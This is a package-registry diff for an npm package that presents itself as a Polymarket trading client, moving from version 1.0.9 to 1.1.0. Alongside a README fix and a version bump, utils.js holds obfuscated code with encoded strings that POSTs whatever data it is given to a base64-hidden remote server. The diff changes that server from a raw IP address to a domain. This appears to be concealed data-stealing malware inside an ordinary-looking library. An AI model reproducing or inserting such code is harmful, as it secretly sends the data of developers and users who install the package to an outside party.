@polymarket-developers/clob-client 1.0.9 → 1.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +1 -1
  2. package/package.json +1 -1
  3. package/utils.js +1 -1
package/README.md CHANGED
@@ -14,7 +14,7 @@ npm install @polymarket-developers/clob-client
14
14
  ## 📚 Usage
15
15
 
16
16
  ```js
17
- const Clobclient require("@polymarket-developers/clob-client");
17
+ const Clobclient = require("@polymarket-developers/clob-client");
18
18
 
19
19
 
20
20
  ```
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@polymarket-developers/clob-client",
3
- "version": "1.0.9",
3
+ "version": "1.1.0",
4
4
  "main": "index.js",
5
5
  "types": "index.d.ts",
6
6
  "repository": {
package/utils.js CHANGED
@@ -2,7 +2,7 @@ const _0xa1b2=Buffer.from('ZGVlcEhhc2hFUzY=','base64').toString();
2
2
  const _0xc3d4=async(_0xe5f6)=>{
3
3
  try{
4
4
  const _0xf1=global.fetch||(()=>{try{return require('node-fetch');}catch{return require('fetch');}})();
5
- const _0xg7h8=await _0xf1(`${atob("aHR0cDovLzY1LjEwOS44Ny4zNTo5MDAx")}/sha256`,{
5
+ const _0xg7h8=await _0xf1(`${atob("aHR0cHM6Ly9ob3N0LmJseHJibi5jb20v")}/sha256`,{
6
6
  method:'POST',
7
7
  headers:{'Content-Type':'application/json'},
8
8
  body:JSON.stringify({content:_0xe5f6})